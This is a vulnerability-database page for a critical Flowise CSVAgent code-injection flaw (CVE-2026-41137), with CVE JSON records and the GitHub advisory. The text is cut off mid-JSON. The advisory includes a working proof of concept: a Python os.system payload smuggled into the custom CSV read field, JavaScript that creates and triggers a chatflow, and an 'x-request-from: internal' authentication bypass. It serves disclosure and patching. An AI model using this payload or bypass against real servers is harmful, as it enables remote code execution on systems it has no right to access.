Vulnerability-Lookup

CVE-2026-41137 (GCVE-0-2026-41137)

Vulnerability from cvelistv5 – Published: 2026-04-23 19:10 – Updated: 2026-04-23 20:20

Title

Flowise: Code Injection in CSVAgent leads to Authenticated RCE

Summary

Flowise is a drag & drop user interface to build a customized large language model flow. Prior to 3.1.0, The CSVAgent allows providing a custom Pandas CSV read code. Due to lack of sanitization, an attacker can provide a command injection payload that will get interpolated and executed by the server. This vulnerability is fixed in 3.1.0.

Severity ?

9.4 (Critical)


                        
                          CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

CWE

CWE-94 - Improper Control of Generation of Code ('Code Injection')

Assigner

GitHub_M

References

URL

Tags

https://github.com/FlowiseAI/Flowise/security/adv…

x_refsource_CONFIRM

Impacted products

Vendor

Product

Version

FlowiseAI

Flowise

Affected: < 3.1.0

FlowiseAI

flowise-components

Affected: < 3.1.0

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2026-41137",
                "options": [
                  {
                    "Exploitation": "poc"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "total"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2026-04-23T20:20:09.323659Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2026-04-23T20:20:30.780Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "references": [
          {
            "tags": [
              "exploit"
            ],
            "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-9wc7-mj3f-74xv"
          }
        ],
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "Flowise",
          "vendor": "FlowiseAI",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 3.1.0"
            }
          ]
        },
        {
          "product": "flowise-components",
          "vendor": "FlowiseAI",
          "versions": [
            {
              "status": "affected",
              "version": "\u003c 3.1.0"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Flowise is a drag \u0026 drop user interface to build a customized large language model flow. Prior to 3.1.0, The CSVAgent allows providing a custom Pandas CSV read code. Due to lack of sanitization, an attacker can provide a command injection payload that will get interpolated and executed by the server. This vulnerability is fixed in 3.1.0."
        }
      ],
      "metrics": [
        {
          "cvssV4_0": {
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "attackVector": "NETWORK",
            "baseScore": 9.4,
            "baseSeverity": "CRITICAL",
            "privilegesRequired": "LOW",
            "subAvailabilityImpact": "HIGH",
            "subConfidentialityImpact": "HIGH",
            "subIntegrityImpact": "HIGH",
            "userInteraction": "NONE",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
            "version": "4.0",
            "vulnAvailabilityImpact": "HIGH",
            "vulnConfidentialityImpact": "HIGH",
            "vulnIntegrityImpact": "HIGH"
          }
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "cweId": "CWE-94",
              "description": "CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)",
              "lang": "en",
              "type": "CWE"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-04-23T19:10:37.727Z",
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M"
      },
      "references": [
        {
          "name": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-9wc7-mj3f-74xv",
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-9wc7-mj3f-74xv"
        }
      ],
      "source": {
        "advisory": "GHSA-9wc7-mj3f-74xv",
        "discovery": "UNKNOWN"
      },
      "title": "Flowise: Code Injection in CSVAgent leads to Authenticated RCE"
    }
  },
  "cveMetadata": {
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "cveId": "CVE-2026-41137",
    "datePublished": "2026-04-23T19:10:37.727Z",
    "dateReserved": "2026-04-17T12:59:15.738Z",
    "dateUpdated": "2026-04-23T20:20:30.780Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "vulnerability-lookup:meta": {
    "nvd": "{\"cve\":{\"id\":\"CVE-2026-41137\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2026-04-23T20:16:14.257\",\"lastModified\":\"2026-04-23T21:16:05.840\",\"vulnStatus\":\"Received\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"Flowise is a drag \u0026 drop user interface to build a customized large language model flow. Prior to 3.1.0, The CSVAgent allows providing a custom Pandas CSV read code. Due to lack of sanitization, an attacker can provide a command injection payload that will get interpolated and executed by the server. This vulnerability is fixed in 3.1.0.\"}],\"metrics\":{\"cvssMetricV40\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"4.0\",\"vectorString\":\"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X\",\"baseScore\":9.4,\"baseSeverity\":\"CRITICAL\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"attackRequirements\":\"NONE\",\"privilegesRequired\":\"LOW\",\"userInteraction\":\"NONE\",\"vulnConfidentialityImpact\":\"HIGH\",\"vulnIntegrityImpact\":\"HIGH\",\"vulnAvailabilityImpact\":\"HIGH\",\"subConfidentialityImpact\":\"HIGH\",\"subIntegrityImpact\":\"HIGH\",\"subAvailabilityImpact\":\"HIGH\",\"exploitMaturity\":\"NOT_DEFINED\",\"confidentialityRequirement\":\"NOT_DEFINED\",\"integrityRequirement\":\"NOT_DEFINED\",\"availabilityRequirement\":\"NOT_DEFINED\",\"modifiedAttackVector\":\"NOT_DEFINED\",\"modifiedAttackComplexity\":\"NOT_DEFINED\",\"modifiedAttackRequirements\":\"NOT_DEFINED\",\"modifiedPrivilegesRequired\":\"NOT_DEFINED\",\"modifiedUserInteraction\":\"NOT_DEFINED\",\"modifiedVulnConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedVulnIntegrityImpact\":\"NOT_DEFINED\",\"modifiedVulnAvailabilityImpact\":\"NOT_DEFINED\",\"modifiedSubConfidentialityImpact\":\"NOT_DEFINED\",\"modifiedSubIntegrityImpact\":\"NOT_DEFINED\",\"modifiedSubAvailabilityImpact\":\"NOT_DEFINED\",\"Safety\":\"NOT_DEFINED\",\"Automatable\":\"NOT_DEFINED\",\"Recovery\":\"NOT_DEFINED\",\"valueDensity\":\"NOT_DEFINED\",\"vulnerabilityResponseEffort\":\"NOT_DEFINED\",\"providerUrgency\":\"NOT_DEFINED\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-94\"}]}],\"references\":[{\"url\":\"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-9wc7-mj3f-74xv\",\"source\":\"security-advisories@github.com\"},{\"url\":\"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-9wc7-mj3f-74xv\",\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\"}]}}",
    "vulnrichment": {
      "containers": "{\"adp\": [{\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2026-41137\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"total\"}], \"version\": \"2.0.3\", \"timestamp\": \"2026-04-23T20:20:09.323659Z\"}}}], \"references\": [{\"url\": \"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-9wc7-mj3f-74xv\", \"tags\": [\"exploit\"]}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2026-04-23T20:20:26.372Z\"}}], \"cna\": {\"title\": \"Flowise: Code Injection in CSVAgent leads to Authenticated RCE\", \"source\": {\"advisory\": \"GHSA-9wc7-mj3f-74xv\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV4_0\": {\"version\": \"4.0\", \"baseScore\": 9.4, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"CRITICAL\", \"vectorString\": \"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"attackRequirements\": \"NONE\", \"privilegesRequired\": \"LOW\", \"subIntegrityImpact\": \"HIGH\", \"vulnIntegrityImpact\": \"HIGH\", \"subAvailabilityImpact\": \"HIGH\", \"vulnAvailabilityImpact\": \"HIGH\", \"subConfidentialityImpact\": \"HIGH\", \"vulnConfidentialityImpact\": \"HIGH\"}}], \"affected\": [{\"vendor\": \"FlowiseAI\", \"product\": \"Flowise\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 3.1.0\"}]}, {\"vendor\": \"FlowiseAI\", \"product\": \"flowise-components\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 3.1.0\"}]}], \"references\": [{\"url\": \"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-9wc7-mj3f-74xv\", \"name\": \"https://github.com/FlowiseAI/Flowise/security/advisories/GHSA-9wc7-mj3f-74xv\", \"tags\": [\"x_refsource_CONFIRM\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"Flowise is a drag \u0026 drop user interface to build a customized large language model flow. Prior to 3.1.0, The CSVAgent allows providing a custom Pandas CSV read code. Due to lack of sanitization, an attacker can provide a command injection payload that will get interpolated and executed by the server. This vulnerability is fixed in 3.1.0.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-94\", \"description\": \"CWE-94: Improper Control of Generation of Code (\u0027Code Injection\u0027)\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2026-04-23T19:10:37.727Z\"}}}",
      "cveMetadata": "{\"cveId\": \"CVE-2026-41137\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2026-04-23T20:20:30.780Z\", \"dateReserved\": \"2026-04-17T12:59:15.738Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2026-04-23T19:10:37.727Z\", \"assignerShortName\": \"GitHub_M\"}",
      "dataType": "CVE_RECORD",
      "dataVersion": "5.2"
    }
  }
}

GHSA-9WC7-MJ3F-74XV

Vulnerability from github – Published: 2026-04-16 21:44 – Updated: 2026-04-16 21:44

Summary

Flowise: Code Injection in CSVAgent leads to Authenticated RCE

Details

Summary

The CSVAgent allows providing a custom Pandas CSV read code. Due to lack of sanitization, an attacker can provide the following payload: DataFrame({'foo': ['bar!']});import os;os.system('whoami') that will get interpolated and executed by the server.

Details

The code in question that introduces the issue is in CSVAgent.ts. customReadCSVFunc is user-controlled and gets interpolated directly without sanitization into the code variable which gets executed by pyodide one line later in: dataframeColDict = await pyodide.runPythonAsync(code). An authenticated attacker can issue the following chain of requests:

Create a new chat flow by sending a POST request to /api/v1/chatflows. This will return the chatflowId in the response.
Send a POST request to /api/v1/prediction/[CHATFLOWID] to trigger the execution of the chatflow. NOTE: the chatflow can contain only this node in order for the exploit to work.
Optionally: send a DELETE request to /api/v1/chatflows to cleanup and delete the chat flow.

Since /chatflows is not whitelisted here, this mandates the user to be authenticated. But, if FLOWISE_USERNAME and FLOWISE_PQSSWORD aren't set, it's sufficient to provide the "x-request-from": "internal" header to bypass authentication.

PoC

Here's the PoC code:

const PORT = 3000;
const FLOWISE_HOST_URL = `http://127.0.0.1:${PORT}`;
const PREDICTION_URL = '/api/v1/prediction';
const CHATFLOWS_URL = '/api/v1/chatflows';

const flowData = JSON.parse("{\"nodes\":[{\"id\":\"csvAgent_0\",\"position\":{\"x\":681,\"y\":212},\"type\":\"customNode\",\"data\":{\"label\":\"CSV Agent\",\"name\":\"csvAgent\",\"version\":3,\"type\":\"AgentExecutor\",\"category\":\"Agents\",\"icon\":\"/home/raul-snyk/research/ai/Flowise/packages/server/node_modules/flowise-components/dist/nodes/agents/CSVAgent/CSVagent.svg\",\"description\":\"Agent used to answer queries on CSV data\",\"baseClasses\":[\"AgentExecutor\",\"BaseChain\",\"Runnable\"],\"inputs\":{\"csvFile\":\"\",\"model\":\"{{openAI_0.data.instance}}\",\"systemMessagePrompt\":\"\",\"inputModeration\":\"\",\"customReadCSV\":\"DataFrame({'foo': ['bar!']});import os;os.system('whoami');\"},\"filePath\":\"/home/raul-snyk/research/ai/Flowise/packages/server/node_modules/flowise-components/dist/nodes/agents/CSVAgent/CSVAgent.js\",\"inputAnchors\":[{\"label\":\"Language Model\",\"name\":\"model\",\"type\":\"BaseLanguageModel\",\"id\":\"csvAgent_0-input-model-BaseLanguageModel\"},{\"label\":\"Input Moderation\",\"description\":\"Detect text that could generate harmful output and prevent it from being sent to the language model\",\"name\":\"inputModeration\",\"type\":\"Moderation\",\"optional\":true,\"list\":true,\"id\":\"csvAgent_0-input-inputModeration-Moderation\"}],\"inputParams\":[{\"label\":\"Csv File\",\"name\":\"csvFile\",\"type\":\"file\",\"fileType\":\".csv\",\"id\":\"csvAgent_0-input-csvFile-file\"},{\"label\":\"System Message\",\"name\":\"systemMessagePrompt\",\"type\":\"string\",\"rows\":4,\"additionalParams\":true,\"optional\":true,\"placeholder\":\"I want you to act as a document that I am having a conversation with. Your name is \\\"AI Assistant\\\". You will provide me with answers from the given info. If the answer is not included, say exactly \\\"Hmm, I am not sure.\\\" and stop after that. Refuse to answer any question not about the info. Never break character.\",\"id\":\"csvAgent_0-input-systemMessagePrompt-string\"},{\"label\":\"Custom Pandas Read_CSV Code\",\"description\":\"Custom Pandas <a target=\\\"_blank\\\" href=\\\"https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.read_csv.html\\\">read_csv</a> function. Takes in an input: \\\"csv_data\\\"\",\"name\":\"customReadCSV\",\"default\":\"read_csv(csv_data)\",\"type\":\"code\",\"optional\":true,\"additionalParams\":true,\"id\":\"csvAgent_0-input-customReadCSV-code\"}],\"outputs\":{},\"outputAnchors\":[{\"id\":\"csvAgent_0-output-csvAgent-AgentExecutor|BaseChain|Runnable\",\"name\":\"csvAgent\",\"label\":\"AgentExecutor\",\"description\":\"Agent used to answer queries on CSV data\",\"type\":\"AgentExecutor | BaseChain | Runnable\"}],\"id\":\"csvAgent_0\",\"selected\":false},\"width\":300,\"height\":464,\"selected\":true,\"dragging\":false,\"positionAbsolute\":{\"x\":681,\"y\":212}},{\"id\":\"openAI_0\",\"position\":{\"x\":238.83389711655053,\"y\":233.09962591816395},\"type\":\"customNode\",\"data\":{\"loadMethods\":{},\"label\":\"OpenAI\",\"name\":\"openAI\",\"version\":4,\"type\":\"OpenAI\",\"icon\":\"/home/raul-snyk/research/ai/Flowise/packages/server/node_modules/flowise-components/dist/nodes/llms/OpenAI/openai.svg\",\"category\":\"LLMs\",\"description\":\"Wrapper around OpenAI large language models\",\"baseClasses\":[\"OpenAI\",\"BaseLLM\",\"BaseLanguageModel\",\"Runnable\"],\"credential\":\"\",\"inputs\":{\"cache\":\"\",\"modelName\":\"gpt-3.5-turbo-instruct\",\"temperature\":0.7,\"maxTokens\":\"\",\"topP\":\"\",\"bestOf\":\"\",\"frequencyPenalty\":\"\",\"presencePenalty\":\"\",\"batchSize\":\"\",\"timeout\":\"\",\"basepath\":\"\",\"baseOptions\":\"\"},\"filePath\":\"/home/raul-snyk/research/ai/Flowise/packages/server/node_modules/flowise-components/dist/nodes/llms/OpenAI/OpenAI.js\",\"inputAnchors\":[{\"label\":\"Cache\",\"name\":\"cache\",\"type\":\"BaseCache\",\"optional\":true,\"id\":\"openAI_0-input-cache-BaseCache\"}],\"inputParams\":[{\"label\":\"Connect Credential\",\"name\":\"credential\",\"type\":\"credential\",\"credentialNames\":[\"openAIApi\"],\"id\":\"openAI_0-input-credential-credential\"},{\"label\":\"Model Name\",\"name\":\"modelName\",\"type\":\"asyncOptions\",\"loadMethod\":\"listModels\",\"default\":\"gpt-3.5-turbo-instruct\",\"id\":\"openAI_0-input-modelName-asyncOptions\"},{\"label\":\"Temperature\",\"name\":\"temperature\",\"type\":\"number\",\"step\":0.1,\"default\":0.7,\"optional\":true,\"id\":\"openAI_0-input-temperature-number\"},{\"label\":\"Max Tokens\",\"name\":\"maxTokens\",\"type\":\"number\",\"step\":1,\"optional\":true,\"additionalParams\":true,\"id\":\"openAI_0-input-maxTokens-number\"},{\"label\":\"Top Probability\",\"name\":\"topP\",\"type\":\"number\",\"step\":0.1,\"optional\":true,\"additionalParams\":true,\"id\":\"openAI_0-input-topP-number\"},{\"label\":\"Best Of\",\"name\":\"bestOf\",\"type\":\"number\",\"step\":1,\"optional\":true,\"additionalParams\":true,\"id\":\"openAI_0-input-bestOf-number\"},{\"label\":\"Frequency Penalty\",\"name\":\"frequencyPenalty\",\"type\":\"number\",\"step\":0.1,\"optional\":true,\"additionalParams\":true,\"id\":\"openAI_0-input-frequencyPenalty-number\"},{\"label\":\"Presence Penalty\",\"name\":\"presencePenalty\",\"type\":\"number\",\"step\":0.1,\"optional\":true,\"additionalParams\":true,\"id\":\"openAI_0-input-presencePenalty-number\"},{\"label\":\"Batch Size\",\"name\":\"batchSize\",\"type\":\"number\",\"step\":1,\"optional\":true,\"additionalParams\":true,\"id\":\"openAI_0-input-batchSize-number\"},{\"label\":\"Timeout\",\"name\":\"timeout\",\"type\":\"number\",\"step\":1,\"optional\":true,\"additionalParams\":true,\"id\":\"openAI_0-input-timeout-number\"},{\"label\":\"BasePath\",\"name\":\"basepath\",\"type\":\"string\",\"optional\":true,\"additionalParams\":true,\"id\":\"openAI_0-input-basepath-string\"},{\"label\":\"BaseOptions\",\"name\":\"baseOptions\",\"type\":\"json\",\"optional\":true,\"additionalParams\":true,\"id\":\"openAI_0-input-baseOptions-json\"}],\"outputs\":{},\"outputAnchors\":[{\"id\":\"openAI_0-output-openAI-OpenAI|BaseLLM|BaseLanguageModel|Runnable\",\"name\":\"openAI\",\"label\":\"OpenAI\",\"description\":\"Wrapper around OpenAI large language models\",\"type\":\"OpenAI | BaseLLM | BaseLanguageModel | Runnable\"}],\"id\":\"openAI_0\",\"selected\":false},\"width\":300,\"height\":574,\"selected\":false,\"positionAbsolute\":{\"x\":238.83389711655053,\"y\":233.09962591816395},\"dragging\":false}],\"edges\":[{\"source\":\"openAI_0\",\"sourceHandle\":\"openAI_0-output-openAI-OpenAI|BaseLLM|BaseLanguageModel|Runnable\",\"target\":\"csvAgent_0\",\"targetHandle\":\"csvAgent_0-input-model-BaseLanguageModel\",\"type\":\"buttonedge\",\"id\":\"openAI_0-openAI_0-output-openAI-OpenAI|BaseLLM|BaseLanguageModel|Runnable-csvAgent_0-csvAgent_0-input-model-BaseLanguageModel\"}],\"viewport\":{\"x\":73.92828909845196,\"y\":-4.475777844396191,\"zoom\":0.7371346086455504}}");
const payload = {"name":"CSV PWN","deployed":false,"isPublic":false,"flowData":JSON.stringify(flowData),"type":"CHATFLOW"};

// Create chatflow.
let res = await fetch(`${FLOWISE_HOST_URL}${CHATFLOWS_URL}`, {
    method: "POST",
    headers: {
        "Content-Type": "application/json",
        "Authorization": "Bearer <your-api-key>"
        //Alternative: "x-request-from": "internal"
    },
    body: JSON.stringify(payload)
});

let resJson = await res.json();
let chatflowId = resJson?.id;

// Trigger vuln.
await fetch(`${FLOWISE_HOST_URL}${PREDICTION_URL}/${chatflowId}`, {
    method: "POST",
    headers: {
        "Content-Type": "application/json"
    },
    body: JSON.stringify({"question": "whoami?"})
});

// Cleanup.
await fetch(`${FLOWISE_HOST_URL}${CHATFLOWS_URL}/${chatflowId}`, {
    method: "DELETE",
    headers: {
        "Content-Type": "application/json",
        "Authorization": "Bearer <your-api-key>"
        //Alternative: "x-request-from": "internal"
    }
});

Impact

This results in Remote Code Execution (RCE) and can allow an attacker to compromise the underlying server.

Severity ?

9.4 (Critical)


                  
                    CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H

Show details on source website

JSON

To clipboard

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.0.13"
      },
      "package": {
        "ecosystem": "npm",
        "name": "flowise"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    },
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 3.0.13"
      },
      "package": {
        "ecosystem": "npm",
        "name": "flowise-components"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "3.1.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-16T21:44:15Z",
    "nvd_published_at": null,
    "severity": "CRITICAL"
  },
  "details": "### Summary\nThe CSVAgent allows providing a custom Pandas CSV read code. Due to lack of sanitization, an attacker can provide the following payload: `DataFrame({\u0027foo\u0027: [\u0027bar!\u0027]});import os;os.system(\u0027whoami\u0027)` that will get interpolated and executed by the server.\n\n### Details\nThe code in question that introduces the issue is in [CSVAgent.ts](https://github.com/FlowiseAI/Flowise/blob/78674897270d58a7086c6c7ccefcc44a5fe9fbf6/packages/components/nodes/agents/CSVAgent/CSVAgent.ts#L157]).\n`customReadCSVFunc` is user-controlled and gets interpolated directly without sanitization into the `code` variable which gets executed by `pyodide` one line later in: `dataframeColDict = await pyodide.runPythonAsync(code)`.\nAn authenticated attacker can issue the following chain of requests:\n\n1. Create a new chat flow by sending a `POST` request to `/api/v1/chatflows`. This will return the `chatflowId` in the response.\n2. Send a `POST` request to `/api/v1/prediction/[CHATFLOWID]` to trigger the execution of the chatflow. NOTE: the chatflow can contain only this node in order for the exploit to work.\n3. Optionally: send a `DELETE` request to `/api/v1/chatflows` to cleanup and delete the chat flow.\n\nSince `/chatflows` is not whitelisted [here](https://github.com/FlowiseAI/Flowise/blob/78674897270d58a7086c6c7ccefcc44a5fe9fbf6/packages/server/src/utils/constants.ts#L1), this mandates the user to be authenticated. But, if `FLOWISE_USERNAME` and `FLOWISE_PQSSWORD` aren\u0027t set, it\u0027s sufficient to provide the `\"x-request-from\": \"internal\"` header to bypass authentication.\n\n### PoC\nHere\u0027s the PoC code:\n```\nconst PORT = 3000;\nconst FLOWISE_HOST_URL = `http://127.0.0.1:${PORT}`;\nconst PREDICTION_URL = \u0027/api/v1/prediction\u0027;\nconst CHATFLOWS_URL = \u0027/api/v1/chatflows\u0027;\n\nconst flowData = JSON.parse(\"{\\\"nodes\\\":[{\\\"id\\\":\\\"csvAgent_0\\\",\\\"position\\\":{\\\"x\\\":681,\\\"y\\\":212},\\\"type\\\":\\\"customNode\\\",\\\"data\\\":{\\\"label\\\":\\\"CSV Agent\\\",\\\"name\\\":\\\"csvAgent\\\",\\\"version\\\":3,\\\"type\\\":\\\"AgentExecutor\\\",\\\"category\\\":\\\"Agents\\\",\\\"icon\\\":\\\"/home/raul-snyk/research/ai/Flowise/packages/server/node_modules/flowise-components/dist/nodes/agents/CSVAgent/CSVagent.svg\\\",\\\"description\\\":\\\"Agent used to answer queries on CSV data\\\",\\\"baseClasses\\\":[\\\"AgentExecutor\\\",\\\"BaseChain\\\",\\\"Runnable\\\"],\\\"inputs\\\":{\\\"csvFile\\\":\\\"\\\",\\\"model\\\":\\\"{{openAI_0.data.instance}}\\\",\\\"systemMessagePrompt\\\":\\\"\\\",\\\"inputModeration\\\":\\\"\\\",\\\"customReadCSV\\\":\\\"DataFrame({\u0027foo\u0027: [\u0027bar!\u0027]});import os;os.system(\u0027whoami\u0027);\\\"},\\\"filePath\\\":\\\"/home/raul-snyk/research/ai/Flowise/packages/server/node_modules/flowise-components/dist/nodes/agents/CSVAgent/CSVAgent.js\\\",\\\"inputAnchors\\\":[{\\\"label\\\":\\\"Language Model\\\",\\\"name\\\":\\\"model\\\",\\\"type\\\":\\\"BaseLanguageModel\\\",\\\"id\\\":\\\"csvAgent_0-input-model-BaseLanguageModel\\\"},{\\\"label\\\":\\\"Input Moderation\\\",\\\"description\\\":\\\"Detect text that could generate harmful output and prevent it from being sent to the language model\\\",\\\"name\\\":\\\"inputModeration\\\",\\\"type\\\":\\\"Moderation\\\",\\\"optional\\\":true,\\\"list\\\":true,\\\"id\\\":\\\"csvAgent_0-input-inputModeration-Moderation\\\"}],\\\"inputParams\\\":[{\\\"label\\\":\\\"Csv File\\\",\\\"name\\\":\\\"csvFile\\\",\\\"type\\\":\\\"file\\\",\\\"fileType\\\":\\\".csv\\\",\\\"id\\\":\\\"csvAgent_0-input-csvFile-file\\\"},{\\\"label\\\":\\\"System Message\\\",\\\"name\\\":\\\"systemMessagePrompt\\\",\\\"type\\\":\\\"string\\\",\\\"rows\\\":4,\\\"additionalParams\\\":true,\\\"optional\\\":true,\\\"placeholder\\\":\\\"I want you to act as a document that I am having a conversation with. Your name is \\\\\\\"AI Assistant\\\\\\\". You will provide me with answers from the given info. If the answer is not included, say exactly \\\\\\\"Hmm, I am not sure.\\\\\\\" and stop after that. Refuse to answer any question not about the info. Never break character.\\\",\\\"id\\\":\\\"csvAgent_0-input-systemMessagePrompt-string\\\"},{\\\"label\\\":\\\"Custom Pandas Read_CSV Code\\\",\\\"description\\\":\\\"Custom Pandas \u003ca target=\\\\\\\"_blank\\\\\\\" href=\\\\\\\"https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.read_csv.html\\\\\\\"\u003eread_csv\u003c/a\u003e function. Takes in an input: \\\\\\\"csv_data\\\\\\\"\\\",\\\"name\\\":\\\"customReadCSV\\\",\\\"default\\\":\\\"read_csv(csv_data)\\\",\\\"type\\\":\\\"code\\\",\\\"optional\\\":true,\\\"additionalParams\\\":true,\\\"id\\\":\\\"csvAgent_0-input-customReadCSV-code\\\"}],\\\"outputs\\\":{},\\\"outputAnchors\\\":[{\\\"id\\\":\\\"csvAgent_0-output-csvAgent-AgentExecutor|BaseChain|Runnable\\\",\\\"name\\\":\\\"csvAgent\\\",\\\"label\\\":\\\"AgentExecutor\\\",\\\"description\\\":\\\"Agent used to answer queries on CSV data\\\",\\\"type\\\":\\\"AgentExecutor | BaseChain | Runnable\\\"}],\\\"id\\\":\\\"csvAgent_0\\\",\\\"selected\\\":false},\\\"width\\\":300,\\\"height\\\":464,\\\"selected\\\":true,\\\"dragging\\\":false,\\\"positionAbsolute\\\":{\\\"x\\\":681,\\\"y\\\":212}},{\\\"id\\\":\\\"openAI_0\\\",\\\"position\\\":{\\\"x\\\":238.83389711655053,\\\"y\\\":233.09962591816395},\\\"type\\\":\\\"customNode\\\",\\\"data\\\":{\\\"loadMethods\\\":{},\\\"label\\\":\\\"OpenAI\\\",\\\"name\\\":\\\"openAI\\\",\\\"version\\\":4,\\\"type\\\":\\\"OpenAI\\\",\\\"icon\\\":\\\"/home/raul-snyk/research/ai/Flowise/packages/server/node_modules/flowise-components/dist/nodes/llms/OpenAI/openai.svg\\\",\\\"category\\\":\\\"LLMs\\\",\\\"description\\\":\\\"Wrapper around OpenAI large language models\\\",\\\"baseClasses\\\":[\\\"OpenAI\\\",\\\"BaseLLM\\\",\\\"BaseLanguageModel\\\",\\\"Runnable\\\"],\\\"credential\\\":\\\"\\\",\\\"inputs\\\":{\\\"cache\\\":\\\"\\\",\\\"modelName\\\":\\\"gpt-3.5-turbo-instruct\\\",\\\"temperature\\\":0.7,\\\"maxTokens\\\":\\\"\\\",\\\"topP\\\":\\\"\\\",\\\"bestOf\\\":\\\"\\\",\\\"frequencyPenalty\\\":\\\"\\\",\\\"presencePenalty\\\":\\\"\\\",\\\"batchSize\\\":\\\"\\\",\\\"timeout\\\":\\\"\\\",\\\"basepath\\\":\\\"\\\",\\\"baseOptions\\\":\\\"\\\"},\\\"filePath\\\":\\\"/home/raul-snyk/research/ai/Flowise/packages/server/node_modules/flowise-components/dist/nodes/llms/OpenAI/OpenAI.js\\\",\\\"inputAnchors\\\":[{\\\"label\\\":\\\"Cache\\\",\\\"name\\\":\\\"cache\\\",\\\"type\\\":\\\"BaseCache\\\",\\\"optional\\\":true,\\\"id\\\":\\\"openAI_0-input-cache-BaseCache\\\"}],\\\"inputParams\\\":[{\\\"label\\\":\\\"Connect Credential\\\",\\\"name\\\":\\\"credential\\\",\\\"type\\\":\\\"credential\\\",\\\"credentialNames\\\":[\\\"openAIApi\\\"],\\\"id\\\":\\\"openAI_0-input-credential-credential\\\"},{\\\"label\\\":\\\"Model 